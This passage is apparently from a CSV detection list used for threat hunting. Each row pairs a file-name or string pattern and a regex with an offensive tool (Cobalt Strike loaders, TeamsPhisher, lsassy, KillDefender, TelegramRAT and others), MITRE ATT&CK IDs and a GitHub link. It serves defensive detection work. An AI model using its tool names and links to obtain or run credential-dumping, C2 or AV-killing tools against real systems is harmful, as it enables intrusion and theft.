Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*TeamFiltration-v*-linux-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-linux\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*TeamFiltration-v*-macOS-arm64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-macOS\-arm64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, 
exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*TeamFiltration-v*-macOS-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-macOS\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*TeamFiltration-v*-win-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-win\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*teams_dump.py teams*",".{0,1000}teams_dump\.py\steams.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*teams_dump-main.zip*",".{0,1000}teams_dump\-main\.zip.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential 
Access","https://github.com/byinarie/teams_dump","1","1","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*teamserver* no_evasion.profile*",".{0,1000}teamserver.{0,1000}\sno_evasion\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*teamServer*ZoomAPI.py*",".{0,1000}teamServer.{0,1000}ZoomAPI\.py.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" 
"*TeamServer.C2Profiles*",".{0,1000}TeamServer\.C2Profiles.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer.exe *github.com*",".{0,1000}TeamServer\.exe\s.{0,1000}github\.com.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*TeamServer.prop*",".{0,1000}TeamServer\.prop.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*TeamServer/Filters/InjectionFilters*",".{0,1000}TeamServer\/Filters\/InjectionFilters.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer/Pivots/*.*",".{0,1000}TeamServer\/Pivots\/.{0,1000}\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer\TeamServer.*",".{0,1000}TeamServer\\TeamServer\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamsPhisher.git*",".{0,1000}TeamsPhisher\.git.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*teamsphisher.log*",".{0,1000}teamsphisher\.log.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - 
TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*teamsphisher.py*",".{0,1000}teamsphisher\.py.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*TeamsPhisher-main.zip*",".{0,1000}TeamsPhisher\-main\.zip.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*teamstracker-main*",".{0,1000}teamstracker\-main.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*teamviewer_passwords.*",".{0,1000}teamviewer_passwords\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*teamviewer_passwords.rb*",".{0,1000}teamviewer_passwords\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*TeamViewerDecrypt.ps1*",".{0,1000}TeamViewerDecrypt\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Technique #1 - Chop Chop - Create/delete*",".{0,1000}Technique\s\#1\s\-\sChop\sChop\s\-\sCreate\/delete.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*techspence/Adeleginator*",".{0,1000}techspence\/Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - 
TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*techspence/ScriptSentry*",".{0,1000}techspence\/ScriptSentry.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*tecknicaltom/dsniff*",".{0,1000}tecknicaltom\/dsniff.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well)","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","178","45","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*Teensypreter.ino*",".{0,1000}Teensypreter\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*telegram2john.py*",".{0,1000}telegram2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*TelegramRAT-main*",".{0,1000}TelegramRAT\-main.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","295","48","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*temp*\pp.exe*",".{0,1000}temp.{0,1000}\\pp\.exe.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","0","N/A","N/A","1","20","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*temp*KillDefender*",".{0,1000}temp.{0,1000}KillDefender.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*temp*lsass_*.dmp*",".{0,1000}temp.{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral 
Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*temp*whoami.txt*",".{0,1000}temp.{0,1000}whoami\.txt.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*Temp\dumpert*",".{0,1000}Temp\\dumpert.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Temp\graca.log*",".{0,1000}Temp\\graca\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - 
T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*temp\stager.exe*",".{0,1000}temp\\stager\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*templates*CSExec.cs*",".{0,1000}templates.{0,1000}CSExec\.cs.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*templates*HIPS_LIPS_processes.txt*",".{0,1000}templates.{0,1000}HIPS_LIPS_processes\.txt.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*templates*reflective_assembly_minified.ps1*",".{0,1000}templates.{0,1000}reflective_assembly_minified\.ps1.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral 
Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*templates/http_SCNotification.exe*",".{0,1000}templates\/http_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*templates/smb_SCNotification.exe*",".{0,1000}templates\/smb_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*tenable.com/downloads/nessus*",".{0,1000}tenable\.com\/downloads\/nessus.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Terminating Windows Defender?*",".{0,1000}Terminating\sWindows\sDefender\?.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*test.endpoint.rapid7.com*",".{0,1000}test\.endpoint\.rapid7\.com.{0,1000}","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
"*test_beef_debugs_spec*",".{0,1000}test_beef_debugs_spec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*test_ccache_fromKirbi*",".{0,1000}test_ccache_fromKirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*test_crawler.py*",".{0,1000}test_crawler\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*test_invoke_bof.x64.o*",".{0,1000}test_invoke_bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*test_litefuzz.py*",".{0,1000}test_litefuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*test_lsassy.*",".{0,1000}test_lsassy\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*test_mitm_initialization.py*",".{0,1000}test_mitm_initialization\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*test_nanodump_exe*",".{0,1000}test_nanodump_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*test_pacu_update.py*",".{0,1000}test_pacu_update\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*test_tezos2john.py*",".{0,1000}test_tezos2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*TestConsoleApp_YSONET*",".{0,1000}TestConsoleApp_YSONET.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*Test-ContainsAmsiPSTokenSignatures -*",".{0,1000}Test\-ContainsAmsiPSTokenSignatures\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense 